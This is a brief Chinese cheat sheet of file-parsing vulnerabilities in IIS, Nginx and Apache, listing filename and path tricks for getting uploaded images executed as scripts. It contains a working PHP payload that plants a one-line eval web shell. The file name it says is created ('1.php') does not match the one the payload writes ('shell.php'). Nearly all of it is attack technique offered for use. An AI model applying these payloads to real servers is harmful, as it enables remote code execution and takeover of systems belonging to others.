IIS 解析漏洞

IIS 5.x/6.0 解析漏洞

1. 目录解析
/xx.asp/xx.jpg
2. 文件解析
xx.asp;.jpg

IIS 7.0/IIS7.5/Nginx <8.03畸形解析漏洞

1. 畸形解析实例—–上传X.jpg,内容为
1
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

访问x.jpg/.php ,该目录下会生成1.php一句话木马

Nginx 解析漏洞

Nginx 0.5. ,0.6. , 0.7 - 0.7.65, 0.8 - 0.8.37

1. 图片中嵌入PHP代码,然后访问
x.jpg%00.php

可以执行PHP代码

Apache 解析漏洞

Apache解析顺序是从右到左,识别不可解析则向左判断

测试时可以尝试上传一个x.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀